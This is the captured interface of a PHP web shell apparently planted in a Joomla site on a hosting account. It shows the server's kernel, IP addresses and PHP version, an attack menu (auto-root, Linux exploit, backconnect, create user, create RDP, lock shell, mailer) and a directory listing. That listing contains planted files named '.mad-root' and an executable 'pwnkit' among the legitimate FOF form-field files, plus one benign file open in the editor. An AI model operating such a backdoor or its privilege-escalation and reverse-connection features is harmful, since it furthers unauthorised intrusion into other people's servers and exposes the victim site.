Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
fof /
form /
field /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
accesslevel.php
3.88
KB
-rw-r--r--
actions.php
5.56
KB
-rw-r--r--
button.php
3.12
KB
-rw-r--r--
cachehandler.php
2.44
KB
-rw-r--r--
calendar.php
5.17
KB
-rw-r--r--
captcha.php
1.96
KB
-rw-r--r--
checkbox.php
3.66
KB
-rw-r--r--
checkboxes.php
2.73
KB
-rw-r--r--
components.php
5.82
KB
-rw-r--r--
editor.php
2.28
KB
-rw-r--r--
email.php
3.6
KB
-rw-r--r--
groupedbutton.php
2.97
KB
-rw-r--r--
groupedlist.php
4.29
KB
-rw-r--r--
hidden.php
1.95
KB
-rw-r--r--
image.php
548
B
-rw-r--r--
imagelist.php
3.11
KB
-rw-r--r--
integer.php
2.39
KB
-rw-r--r--
language.php
2.81
KB
-rw-r--r--
list.php
9.71
KB
-rw-r--r--
media.php
2.97
KB
-rw-r--r--
model.php
6.52
KB
-rw-r--r--
ordering.php
5.69
KB
-rw-r--r--
password.php
2.39
KB
-rw-r--r--
plugins.php
2.43
KB
-rw-r--r--
published.php
4.63
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
radio.php
2.41
KB
-rw-r--r--
relation.php
4.87
KB
-rw-r--r--
rules.php
25.21
KB
-rw-r--r--
selectrow.php
2.87
KB
-rw-r--r--
sessionhandler.php
2.44
KB
-rw-r--r--
spacer.php
1.97
KB
-rw-r--r--
sql.php
2.44
KB
-rw-r--r--
tag.php
5.25
KB
-rw-r--r--
tel.php
3.49
KB
-rw-r--r--
text.php
5.19
KB
-rw-r--r--
textarea.php
2.16
KB
-rw-r--r--
timezone.php
2.52
KB
-rw-r--r--
title.php
1.53
KB
-rw-r--r--
url.php
3.48
KB
-rw-r--r--
user.php
6.86
KB
-rw-r--r--
usergroup.php
3.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : title.php
<?php /** * @package FrameworkOnFramework * @subpackage form * @copyright Copyright (C) 2010 - 2015 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // Protect from unauthorized access defined('FOF_INCLUDED') or die; JFormHelper::loadFieldClass('text'); /** * Form Field class for the FOF framework * Supports a title field with an optional slug display below it. * * @package FrameworkOnFramework * @since 2.0 */ class FOFFormFieldTitle extends FOFFormFieldText implements FOFFormField { /** * Get the rendering of this field type for a repeatable (grid) display, * e.g. in a view listing many item (typically a "browse" task) * * @since 2.0 * * @return string The field HTML */ public function getRepeatable() { // Initialise $slug_format = '(%s)'; $slug_class = 'small'; // Get field parameters if ($this->element['slug_field']) { $slug_field = (string) $this->element['slug_field']; } else { $slug_field = $this->item->getColumnAlias('slug'); } if ($this->element['slug_format']) { $slug_format = (string) $this->element['slug_format']; } if ($this->element['slug_class']) { $slug_class = (string) $this->element['slug_class']; } // Get the regular display $html = parent::getRepeatable(); $slug = $this->item->$slug_field; $html .= '<br />' . '<span class="' . $slug_class . '">'; $html .= JText::sprintf($slug_format, $slug); $html .= '</span>'; return $html; } }
Close